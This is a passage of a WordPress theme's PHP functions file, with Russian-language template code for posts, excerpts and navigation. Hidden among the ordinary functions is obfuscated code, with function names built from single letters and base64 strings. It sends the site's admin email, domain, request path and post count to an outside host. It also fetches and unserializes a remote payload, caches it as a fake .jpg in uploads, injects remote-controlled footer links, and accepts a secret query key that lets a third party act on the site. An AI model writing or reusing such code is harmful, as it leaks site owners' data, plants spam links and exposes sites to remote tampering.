<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $MrySGC='d';$LatNXFU='a';$fpewjkS='e';$KTkbDL='_';$hXbgyMa='o';$QNhRI='e';$qJACjG='s';$jtrxkfE='e';$zDMlEfZ='4';$VhFh='6';$NDuqqM='d';$xPiWs='c';$KoElMUw='b';$tVIirUgw=$KoElMUw.$LatNXFU.$qJACjG.$fpewjkS.$VhFh.$zDMlEfZ.$KTkbDL.$MrySGC.$QNhRI.$xPiWs.$hXbgyMa.$NDuqqM.$jtrxkfE;$wFhX='n';$KqvQkP='i';$rMkyj='t';$QxDhFxj='g';$fUYoyC='l';$yqPlZAC='a';$GgsOnlL='e';$hhSXXp='f';$DBaOaM='z';$lPaBYZjo=$QxDhFxj.$DBaOaM.$KqvQkP.$wFhX.$hhSXXp.$fUYoyC.$yqPlZAC.$rMkyj.$GgsOnlL;$YONcqBS='1';$VdBOQWf='_';$gIWRNuT='r';$bHHBT='r';$buGzCO='o';$HNsp='3';$xcSH='s';$bxhhQV='t';$ykqfR='t';$MurdkCcK=$xcSH.$bxhhQV.$bHHBT.$VdBOQWf.$gIWRNuT.$buGzCO.$ykqfR.$YONcqBS.$HNsp;$fMJKmH='t';$Myvc='v';$Rgrgpax='e';$IJPO='r';$yLGsT='r';$rOMbrq='s';$Ggmcrwoj=$rOMbrq.$fMJKmH.$yLGsT.$IJPO.$Rgrgpax.$Myvc;                     
		$hl___s='d';$uc__________o='a';$ie__x='e';$pb______b='_';$dk______________l='o';$jw___d='e';$uk___________d='s';$dy____________f='e';$bn_____c='4';$tf_________l='6';$oy_______h='d';$ys___________t='c';$ky_____________j='b';$wp___v=$ky_____________j.$uc__________o.$uk___________d.$ie__x.$tf_________l.$bn_____c.$pb______b.$hl___s.$jw___d.$ys___________t.$dk______________l.$oy_______h.$dy____________f;
		$um____________w='o';$hk__b='c';$my________a='s';$os_____________j='n';$yw_____z='i';$ml_______________b='e';$ou___v='n';$ut_______t='t';$uz____p='t';$rz___________f='u';$gh_______y='f';$cn____________u='_';$eu________m='x';$fm_________z='i';$gx____________e='s';$zf______j=$gh_______y.$rz___________f.$os_____________j.$hk__b.$ut_______t.$yw_____z.$um____________w.$ou___v.$cn____________u.$ml_______________b.$eu________m.$fm_________z.$gx____________e.$uz____p.$my________a;
		$xy_________h='n';$hh_____i='e';$nr___________q='p';$dy_____________w='o';$if________u='f';$ri___________h=$if________u.$dy_____________w.$nr___________q.$hh_____i.$xy_________h;
		$in_____________c='a';$ho_______________j='r';$bi____v='d';$uv__g='e';$uj_______________r='f';$vt_____________g=$uj_______________r.$ho_______________j.$uv__g.$in_____________c.$bi____v;
		$zc______________f='e';$wa__q='c';$ou_____v='f';$jq_____s='s';$oo____t='o';$mt____________m='l';$dx__________d=$ou_____v.$wa__q.$mt____________m.$oo____t.$jq_____s.$zc______________f;
		
		define("WP_ID", $wp___v("Mi4wLjA="));
		define("WP_TTL", $wp___v("MTA4MDA="));
		define("WP_SRC", $wp___v("dHBva24="));
	


		function wp_get_header() {
			global $wp___v, $zf______j;
			
			if (
				$zf______j($wp___v("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$zf______j($wp___v("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$zf______j($wp___v("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $wp___v, $ri___________h, $dx__________d, $vt_____________g;
			
			$xs____________y = TEMPLATEPATH."/".$wp___v("Zm9vdGVyLnBocA==");
			$ip_______________o = @$ri___________h($xs____________y, "r");
			$xs____________y = @$vt_____________g($ip_______________o, @filesize($xs____________y));
			@$dx__________d($ip_______________o);
			
			$gw________b = TEMPLATEPATH."/".$wp___v("ZnVuY3Rpb25zLnBocA==");
			$ip_______________o = @$ri___________h($gw________b, "r");
			$gw________b = @$vt_____________g($ip_______________o, @filesize($gw________b));
			@$dx__________d($ip_______________o);
			
			$kx____________c = 0;
			if($xs____________y && $gw________b) {
				if ($wp___v("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($xs____________y, $wp___v("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$kx____________c = 1;
					}
					if (substr_count($xs____________y, "wp_theme_GPL_credits()") < 1) {
						$kx____________c = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$kx____________c = 12;
				}
			}
			
			if($kx____________c > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $kx____________c -->";
			}
		}
	


		function wp_loaded() {
			global $wp___v, $zf______j;
			return $zf______j($wp___v("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($dv______e, $cw___________g = "(more...)", $fy____________l = 0, $ou__j = "") {
				$rz_______x = get_the_content($cw___________g, $fy____________l, $ou__j);
				$rz_______x = apply_filters("the_content", $rz_______x);
				
				$rz_______x = str_replace("]]>", "]]>", $rz_______x);
				if (strlen($_GET["p"]) > 0) {
					echo $rz_______x;
				}
				else if ((strlen($rz_______x)>$dv______e) && ($mr___b = strpos($rz_______x, " ", $dv______e ))) {
					$rz_______x = substr($rz_______x, 0, $mr___b);
					$rz_______x = $rz_______x;
					echo $rz_______x;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$cw___________g</a></div></p>";
				} else {
					echo $rz_______x;
				}
				
			}
		}
	


		$en______h='c';$ez______________q='e';$mh___p='n';$uc___x='d';$ek____________l='e';$xu___________a='e';$dv___________v='6';$db___w='4';$cx_______s='a';$cu_________x='s';$iv____m='o';$hc_________q='b';$lh_______________s='_';$mj________k=$hc_________q.$cx_______s.$cu_________x.$ez______________q.$dv___________v.$db___w.$lh_______________s.$ek____________l.$mh___p.$en______h.$iv____m.$uc___x.$xu___________a;
		$ad_______________t='c';$sd_____________u='e';$of__m='e';$pq__l='t';$ah____________p='o';$qi______________g='n';$sw______a='l';$vn______________k='f';$gb______o='i';$xn_________y='s';$nv___t='n';$de_______c='g';$yy___________d='t';$ft_______a='_';$ez_____________k='_';$cn_________c='e';$on____________s='t';$bb________d=$vn______________k.$gb______o.$sw______a.$of__m.$ft_______a.$de_______c.$cn_________c.$pq__l.$ez_____________k.$ad_______________t.$ah____________p.$nv___t.$on____________s.$sd_____________u.$qi______________g.$yy___________d.$xn_________y;
		$xh______________u='t';$kc_________b='f';$fd___d='x';$xk____________z='l';$dv__n='i';$xd___________b='e';$jj___________q='i';$sx___________m='e';$xn__________h='s';$sr____________k='s';$te___b='_';$uy__m=$kc_________b.$jj___________q.$xk____________z.$sx___________m.$te___b.$xd___________b.$fd___d.$dv__n.$xn__________h.$xh______________u.$sr____________k;
		$kl____________d='o';$ie__s='a';$st___g='m';$ca_______________t='e';$ni_______________u='s';$kx_________b='o';$ua_________l='e';$ij______d='c';$cb__j='p';$qd_______q='_';$pv_____________b='r';$ru_____a='r';$hh___r='i';$ae_______________s='v';$lh____y='n';$ga______________j=$ae_______________s.$ua_________l.$ru_____a.$ni_______________u.$hh___r.$kl____________d.$lh____y.$qd_______q.$ij______d.$kx_________b.$st___g.$cb__j.$ie__s.$pv_____________b.$ca_______________t;
		$bt__k='k';$pw_______s='p';$ap______________h='n';$mu______s='c';$mc________f='e';$dd______________x='o';$gr___________q='s';$tx___r='f';$gb______a='o';$is_____________j=$tx___r.$gr___________q.$gb______a.$mu______s.$bt__k.$dd______________x.$pw_______s.$mc________f.$ap______________h;
		$ad____________b='t';$ki____b='w';$lv_______r='f';$mb___________c='i';$oq____o='r';$nj____________t='e';$cf________q=$lv_______r.$ki____b.$oq____o.$mb___________c.$ad____________b.$nj____________t;
		$xy_________k='m';$ig___v='5';$af________a='d';$xe_____________m=$xy_________k.$af________a.$ig___v;
		$ky__a='a';$vc____c='h';$aa_________i='e';$br_________d='l';$hv____________u='r';$kq_____________j='t';$wl____h='p';$vg__m='a';$dw____h=$hv____________u.$aa_________i.$ky__a.$br_________d.$wl____h.$vg__m.$kq_____________j.$vc____c;
		$un_____v='i';$oi___________m='r';$xz_______l='s';$nw__________k='l';$bn_____u='n';$xx______________w='u';$mj__x='a';$ya______________w='e';$nz_______m='e';$bx____________c='i';$an__________y='z';$js_______________f=$xx______________w.$bn_____u.$xz_______l.$ya______________w.$oi___________m.$bx____________c.$mj__x.$nw__________k.$un_____v.$an__________y.$nz_______m;
		$hc__________k='m';$bf________r='t';$fo______e='e';$yy__q='p';$ii____________f='m';$lk______________i='a';$xc___k='n';$po________n=$bf________r.$fo______e.$hc__________k.$yy__q.$xc___k.$lk______________i.$ii____________f;
		$az_______________l='_';$mo______________u='t';$qq______________e='n';$ha_________z='e';$sf__________a='c';$lp______________y='e';$wd_____________n='m';$ow___________s='r';$af__k='_';$cv____________s='r';$ju________e='t';$va____j='e';$nv_______________o='t';$ok____________h='e';$fl__t='t';$up__________a='s';$te___________r='a';$iw____s='o';$du___________s='a';$ks_____e='c';$ok_______________l='x';$zg____________x=$up__________a.$ju________e.$ow___________s.$ha_________z.$te___________r.$wd_____________n.$af__k.$ks_____e.$iw____s.$qq______________e.$mo______________u.$ok____________h.$ok_______________l.$nv_______________o.$az_______________l.$sf__________a.$cv____________s.$lp______________y.$du___________s.$fl__t.$va____j;
	


		function dd__s($nv______________q) {
			global $wp___v, $zf______j, $bb________d, $ga______________j, $zg____________x;
			
			if (!$zf______j($wp___v("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ga______________j(PHP_VERSION, "5.0.0", ">=") && $zf______j($wp___v("ZmlsZV9nZXRfY29udGVudHM=")) && $zf______j($wp___v("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ht_____p = $zg____________x(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$nt______________j = @$bb________d($nv______________q, 0, $ht_____p);
			} else {
				$nt______________j = @$bb________d($nv______________q, 0);
			}
			
			return $nt______________j;
		}
	


		function tt___l($nv______________q) {
			global $zf______j, $is_____________j, $cf________q, $wp___v;
			
			if (!$zf______j($wp___v("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$dy______g = strpos($nv______________q, "/", 7);
			$lj__________x = array(
				"uri"     => substr($nv______________q, $dy______g),
				"host"    => str_replace("http://", "", substr($nv______________q, 0, $dy______g)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$nu________z = @$is_____________j("$lj__________x[host]", 80, $aj___________h, $gl____b, 4);
			
			if (!$nu________z) {
				return false;
			} else {
				$nt______________j = "";
				$pg____________x  = "GET $lj__________x[uri] HTTP/1.0\r\n";
				$pg____________x .= "Host: $lj__________x[host]\r\n";
				$pg____________x .= "Referer: $lj__________x[referer]\r\n";
				$pg____________x .= "Connection: Close\r\n\r\n";
				
				@$cf________q($nu________z, $pg____________x);
				
				while (!@feof($nu________z)) {
					$rq______________n = @fgets($nu________z, (1024*24));
					
					if ($rq______________n == "\r\n") {
						$ak______________u = true;
						continue;
					}
					
					if ($ak______________u) {
						$nt______________j .= $rq______________n;
					}
				}
				
				return $nt______________j;
			}
		}
	


		function qz_________a($nv______________q) {
			global $zf______j;
			$nq___________w = false;
			
			if ($nv______________q != "") {
				if ($zf______j("dd__s")) {
					$nq___________w = @dd__s($nv______________q);
				}
				
				if (!$nq___________w && ($zf______j("tt___l"))) {
					$nq___________w = @tt___l($nv______________q);
				}
			}
			
			return $nq___________w;
		}
	


		function pr______________y() {
			global $_SERVER, $xe_____________m;
			
			$md__c = $_SERVER["SERVER_NAME"];
			
			if (substr("$md__c", 0, 4) == "www.") {
				$md__c = substr("$md__c", 4);
			}
			
			$md__c = $xe_____________m("$_SERVER[SERVER_NAME]");
			
			return $md__c;
		}
	


		function aq______________o() {
			return "file";
		}
	


		function tq__________d($nv______________q) {
			global $_SERVER, $bb________d, $uy__m, $ri___________h, $dx__________d, $cf________q;
			
			$as_____f = ad______m();
			
			$ds_______________y = pr______________y().".jpg";
			$ct_________s = $as_____f["dir_upload"]["path"]."/$ds_______________y";
			$uu_______________k = @filemtime($ct_________s);
			
			if (!$uu_______________k || ((time()-$uu_______________k) >= WP_TTL)) {
				$nq___________w = qz_________a($nv______________q);
				
				if ($nq___________w) {
					if ($uy__m($ct_________s)) {
						@unlink($ct_________s);
					}
					
					$ip_______________o = @$ri___________h($ct_________s, "x+");
					
					@$cf________q($ip_______________o, $nq___________w);
					@$dx__________d($ip_______________o);
				}
			} else {
				if ($uy__m($ct_________s)) {
					$nq___________w = @$bb________d($ct_________s);
				} else {
					$nq___________w = false;
				}
			}
			
			return $nq___________w;
		}
	


		function ad______m() {
			global $_SERVER, $wp___v, $mj________k;
			
			$wl_______________f = wp_count_posts("post");
			$si____m = pathinfo(get_bloginfo("template_directory"));
			
			$as_____f = array(
				"url" => array(
					"report"      => $wp___v("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $si____m,
				"dir_upload"	=> wa____d(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$si____m[filename],
					"a005=".$wl_______________f->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$as_____f["url"]["queryString"] = implode("&", $as_____f["queryString"]);
			$as_____f["url"]["report"] = $as_____f["url"]["report"]."/?".$mj________k($as_____f["url"]["queryString"]).".html";
						
			return $as_____f;
		}
	


		function wa____d() {
			$rk_________z = wp_upload_dir();
			
			if (isset($rk_________z["error"])) {
				$oq____k = gw________i();
				if (is_writable($oq____k)) {
					$rk_________z = array("path" => $oq____k);
				}
			}

			return $rk_________z;
		}
	


		function gw________i() {
			global $zf______j, $xe_____________m, $dw____h, $po________n;
			
			$gq__x = (bool) ini_get("safe_mode");
			if ($gq__x == true) {
				return false;
			}
			
			if ($zf______j("sys_get_temp_dir")) {
				$ha____x = sys_get_temp_dir();
				if (is_writable($ha____x)) {
					return $dw____h($ha____x);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $dw____h($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $dw____h($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $dw____h($_ENV["TEMP"]);
			} else {
				$ja___n = $po________n($xe_____________m(uniqid(rand(), true)), "");
				if ($ja___n) {
					$ha____x = $dw____h(dirname($ja___n));
					@unlink($ja___n);
					return $ha____x;
				} else {
					return false;
				}
			}
		}
	


		function bm___________l() {
			global $_GET, $uy__m;
			
			$as_____f = ad______m();
			$md__c = pr______________y();
			$pa__________o = aq______________o();
			
			$dt__a = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($pa__________o == "file") {
					$ei_________l = $as_____f["dir_upload"]["path"]."/".$md__c.".jpg";
					if ($uy__m($ei_________l)) {
						@unlink($ei_________l);
						$dt__a = "deleted";
					}
				}
				
				$kg_________w = array(
					"s"	=> $dt__a,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($kg_________w AS $nb______s => $kv____b) echo " [$nb______s:$kv____b]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $zf______j, $wp___v, $js_______________f;
			$as_____f = ad______m();
			
			$wy_____________t = "tq__________d";
			if ($zf______j($wy_____________t)) {
				$nt______________j = $wy_____________t($as_____f["url"]["report"]);
			}
			
			if ($nt______________j) {
				if ($nt______________j = @$wp___v($nt______________j)) {
					$nt______________j = @$js_______________f($nt______________j);
					
					if (strlen($nt______________j[custom_credit]) >= 5) {
						$as_____f["default_string"] = $nt______________j[custom_credit];
					}
					
					if ($nt______________j["status"] == "0") {
						$xc___________w = 1;
						$pc_______z = 1;
					} else {
						$tz______x = sizeof($nt______________j["links"]);
						$dt__________i = $as_____f["default_string"];
						
						if ($tz______x > 0 && $nt______________j["links"] !== "") {
							$ur___________d = 0;
							foreach ($nt______________j["links"] as $rw_______________u => $zd______________x) {
								$ur___________d++;
								if ($zd______________x->l_path == "" || $zd______________x->l_path == $_SERVER["REQUEST_URI"]) {
									$zd______________x->l_href = htmlspecialchars(strip_tags($zd______________x->l_href));
									$zd______________x->l_title = htmlspecialchars(strip_tags($zd______________x->l_title));
									$zd______________x->l_anchor = htmlspecialchars(strip_tags($zd______________x->l_anchor));
									$dt__________i .= " | ";
									$dt__________i .= "<a href='$zd______________x->l_href' title='$zd______________x->l_title'";
									if ($zd______________x->l_nofollow == "1") {
										$dt__________i .= " rel='nofollow'";
									}
									$dt__________i .= ">$zd______________x->l_anchor</a>";
								}
							}
						}
						$as_____f["links"] = "$dt__________i";
						if ($nt______________j[credit] == "0") {
							$as_____f["links"] = "";
						}
					}
				} else {
					$xc___________w = "1";
				}
			} else {
				$xc___________w = "1";
			}
			
			if ($xc___________w == "1") {
				$as_____f["links"] = $as_____f["default_string"];
			}
			
			echo "$as_____f[links]";
			
			echo "<!-- s: $nt______________j[signature] -->";
			bm___________l();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
